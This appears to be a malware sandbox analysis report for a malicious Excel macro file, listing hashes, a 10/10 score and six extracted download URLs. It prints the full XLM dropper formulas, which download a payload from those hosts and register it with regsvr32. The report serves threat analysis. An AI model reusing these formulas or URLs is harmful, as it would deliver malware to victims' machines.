Overview

overview

10

Static

static

10

c9c1f82b2a...5.xlsm

windows7-x64

10

c9c1f82b2a...5.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    c9c1f82b2ac46b614de0afacf031596e7f9a212da822c24e4fd805b72cb179e5

  • Size

    48KB

  • Sample

    241120-plh4wswrb1

  • MD5

    38beed4ce9981a996050e06e7a297685

  • SHA1

    241356f39f40e2106358d9afce54b40bb904b2e8

  • SHA256

    c9c1f82b2ac46b614de0afacf031596e7f9a212da822c24e4fd805b72cb179e5

  • SHA512

    4c86afbc5bd6afb877526485906b9b1bb381710302d06e86013190722afec6422fd2cf9237e49f3c5b93a6f886c8e60c614eab2a35ba4eb73acdf0cc03d41c72

  • SSDEEP

    768:zO+CAEWvxRc3mlkKDNWBA7rTj+RYV8Q0RuVBR2jPrtysHRX0AOBAa:z7O2b8QkKDNck01u/R2rZyjtBl

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://suleyera.com/components/CNGhltc5v2K6/

http://sociallysavvyseo.com/PinnacleDynamicServices/pRlYMzvfuu5B/

http://moveit.savvyint.com/config/DsfssbO7BYG/

https://schwizer.net/styled/D0MG/

http://shabeerpv.atwebpages.com/css/ww6if1YAsMpjpuGz/

http://shimal.atwebpages.com/wp-content/xkaRkHr/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://suleyera.com/components/CNGhltc5v2K6/","..\ax.ocx",0,0) =IF('LGGDGB'!E11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://sociallysavvyseo.com/PinnacleDynamicServices/pRlYMzvfuu5B/","..\ax.ocx",0,0)) =IF('LGGDGB'!E13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://moveit.savvyint.com/config/DsfssbO7BYG/","..\ax.ocx",0,0)) =IF('LGGDGB'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://schwizer.net/styled/D0MG/","..\ax.ocx",0,0)) =IF('LGGDGB'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://shabeerpv.atwebpages.com/css/ww6if1YAsMpjpuGz/","..\ax.ocx",0,0)) =IF('LGGDGB'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://shimal.atwebpages.com/wp-content/xkaRkHr/","..\ax.ocx",0,0)) =IF('LGGDGB'!E21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\ax.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://suleyera.com/components/CNGhltc5v2K6/
xlm40.dropper

http://sociallysavvyseo.com/PinnacleDynamicServices/pRlYMzvfuu5B/

Targets

    • Target

      c9c1f82b2ac46b614de0afacf031596e7f9a212da822c24e4fd805b72cb179e5

    • Size

      48KB

    • MD5

      38beed4ce9981a996050e06e7a297685

    • SHA1

      241356f39f40e2106358d9afce54b40bb904b2e8

    • SHA256

      c9c1f82b2ac46b614de0afacf031596e7f9a212da822c24e4fd805b72cb179e5

    • SHA512

      4c86afbc5bd6afb877526485906b9b1bb381710302d06e86013190722afec6422fd2cf9237e49f3c5b93a6f886c8e60c614eab2a35ba4eb73acdf0cc03d41c72

    • SSDEEP

      768:zO+CAEWvxRc3mlkKDNWBA7rTj+RYV8Q0RuVBR2jPrtysHRX0AOBAa:z7O2b8QkKDNck01u/R2rZyjtBl

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks